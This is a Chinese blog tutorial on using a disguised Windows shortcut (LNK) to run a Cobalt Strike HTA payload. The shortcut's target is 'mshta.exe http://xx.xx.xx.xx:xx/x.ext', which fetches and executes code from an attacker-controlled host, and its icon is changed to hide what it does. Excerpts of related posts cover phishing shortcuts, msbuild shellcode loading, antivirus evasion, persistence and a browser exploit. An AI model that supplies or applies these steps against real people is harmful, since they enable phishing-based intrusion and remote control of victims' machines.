利用快捷方式-LNK-上线CS

最新推荐文章于 2024-06-21 19:35:00 发布
最新推荐文章于 2024-06-21 19:35:00 发布
阅读量376 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: windows
原文链接:https://blog.csdn.net/weixin_45701675/article/details/121492499?spm=1001.2014.3001.5502
版权

步骤:
1、生成:Attacks -> Packages -> Html Application
2、上传:Attacks——>Web Drive by——>Host file
3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
4、伪装:
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装

这里会用到windows中的mshta,用于执行hta文件

mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件

下面进行演示

打开已经配置好的CS

1、生成:Attacks -> Packages -> Html Application

选择设置的监听器-power shell

生成evil.hta

 

2、上传:Attacks——>Web Drive by——>Host file

复制生成的利用文件网址

 

3.创建快捷方式

4.执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext

5.伪装(自行拓展,不做演示)

-创建快捷方式

-生成HTA并上传

-属性更改目标执行

-属性更改图标伪装(自行扩展)

点击快捷方式-快捷方式成功上线

 

zxl2605
关注
专栏目录
红队钓鱼技术之LNK快捷方式
xf555er的博客
08-07 1181
lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
CS木马的几种上线方式总结
Shanfenglan's blog
10-20 13万+
CATALOG前言windows相关上线方式1.利用mshta与wmic上线2.利用powershell上线3.利用msbuild上线linux相关上线方式1.利用Cross2上线linux主机 前言 CS上线方式还是有不少的,但是时间长不看容易忘记一部分,博客记录也比较分散导致找起来比较麻烦,因此写了这篇博客记录一下CS上线的相关知识点。 windows相关上线方式 1.利用mshta与wmic上线 不用powershell执行powershell脚本与xsl文件不落地上线 2.利用powershell上
快捷方式(lnk)--加载&HTA-CS上线
最新发布
金灰的博客
06-21 675
免责声明:本文仅做技术交流与学习...
Windows提权_CS提权上线
weixin_39953838的博客
01-04 1470
许多过往之人事,可想可念不可急。
chrome上线cs & wx上线
m0_48520508的博客
05-12 571
一、 Chrome漏洞上线cs 参考:https://mp.weixin.qq.com/s/LOpAu8vs8ob85W3sCmXMew 1、使用以下脚本,保存为chrome.html格式 <script> function gc() { for (var i = 0; i < 0x80000; ++i) { var a = new ArrayBuffer(); } } let shellcode = []; var wasmCode = new Uint8Array([0, 97, 1.
利用msbuild命令执行文件上线CS
热门推荐
Shanfenglan's blog
08-28 25万+
实现效果 原理 Use MSBuild To Do More 可以简单的理解为,windows下的msbuild命令可以执行内容为特定格式的文件。在.NET Framework 4.0中支持了一项新功能”Inline Tasks”,被包含在元素UsingTask中,可用来在xml文件中执行c#代码。 用途 因为这种方式不限制文件的后缀名,只要内容格式符合要求即可。所以可以几乎所有绕过白名单检测来执行shellcode,可在一定程度上达到免杀效果。 文件参考 <Project ToolsVersio
免杀制作-教你如何一键制作window-CS上线免杀马(新手推荐)
weixin_42109829的博客
10-20 7231
一、免杀思路 应该说每一类型的恶意软件所实施的反检测技术都是不一样的(恶意软件可以分为病毒、木马、僵尸程序、流氓软件、勒索软件、广告程序等),虽然本文会对所有相关的反检测技术都进行介绍,但我们还是会将注意力放在stager阶段的meterpreter这种有效载荷的工具上,因为几乎所有的恶意软件的攻击命令的执行都必须依靠 meterpreter来实施攻击,例如: 提权、凭证窃取、进程迁移、注册表操作和分配更多的后续攻击, 另外,MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说
ST-LNK下载器需要的驱动
10-17
为了更好地利用ST-LNK下载器,开发者需要熟悉相关的软件工具,如STLink Utility、STM32CubeProgrammer或第三方IDEs(如Keil uVision或IAR Embedded Workbench),这些工具通常集成了ST-LNK驱动的安装和配置。...
BaiduNetdiskDownload - 快捷方式.lnk
05-01
BaiduNetdiskDownload - 快捷方式.lnk
快捷方式lnk-易语言
06-13
在IT行业中,快捷方式(lnk)是Windows操作系统中一个非常重要的概念。快捷方式是一种特殊类型的文件,它不包含实际的数据,而是指向其他文件或程序的指针。这使得用户能够快速访问常用的应用程序、文件夹或者文档,而...
OneDrive - 快捷方式.lnk
06-19
OneDrive - 快捷方式.lnk
index - 快捷方式.lnk
12-24
index - 快捷方式.lnk
2024年最全Windows权限维持技术总结、复现_cs权限维持(2)
2401_84281601的博客
05-01 462
Windows 上有一个重要的机制,也就是服务。服务程序通常默默的运行在后台,且拥有 SYSTEM 权限,非常适合用于后门持久化。我们可以将 EXE 文件注册为服务来作为后门。Windows 实现计划任务主要有 at 与 schtasks 两种方式,通过计划任务可以定时启动后门程序at 适用于windows 2000、2003、xp,schtasks适用于windows >= 2003利用 windows 开机启动项实现权限的维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式。
内网渗透-cobaltstrike之cs上线获取shell
lza20001103的博客
04-30 7239
cobaltstrike之cs上线获取shell
Cobalt Strike 环境搭建与一次简单的上线教程
weixin_52049485的博客
01-08 6267
环境部署 服务器端:Kali 客户端:Win10 靶机:Win7 注意:CS基于java环境,首先安装java,jdk1.8 CS安装 将准备好的cs4.0压缩包拷贝到Kali中,解压后可以看到cs的目录结构 赋予 teamserver 执行权限 chmod +x teamsercer 运行方式:服务端ip,并且设置连接密码 ./teamserver 192.168.20.106 123456 如下图所示,cs就已经安装成功,进入等待客户端连接的状态。。。(默认50050端口) Windows客户端
红日靶场一
weixin_61899124的博客
06-06 117
访问网页,发现为phpstudy探针,说明网站是phpstudy搭建的。设置好之后,win7主机开启phpsyudy,配置就完成了。开放了3306端口,存在mysql数据库,可能存在弱口令。win2003 内网网段192.168.152.129。win7 内网网段192.168.152.128。查看数据库是否有导入权限,看能否直接导入木马。发现mysql存在root,root弱口令。弱口令root,root,成功登录到后台。使用cs生成一个木马,通过蚁剑上传并执行。日志记录功能关闭,但是可以开启。
CS不出网各种上线姿势
不曾扬帆,何以至远方
07-08 1534
CS不出网的各种上线姿势
Windows】基于curl命令的Shell上线姿势--解决shiro命令执行工具命令回显拉胯的问题
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-07 1138
基于curl命令的Shell上线姿势--解决shiro命令执行漏洞命令回显拉胯的问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值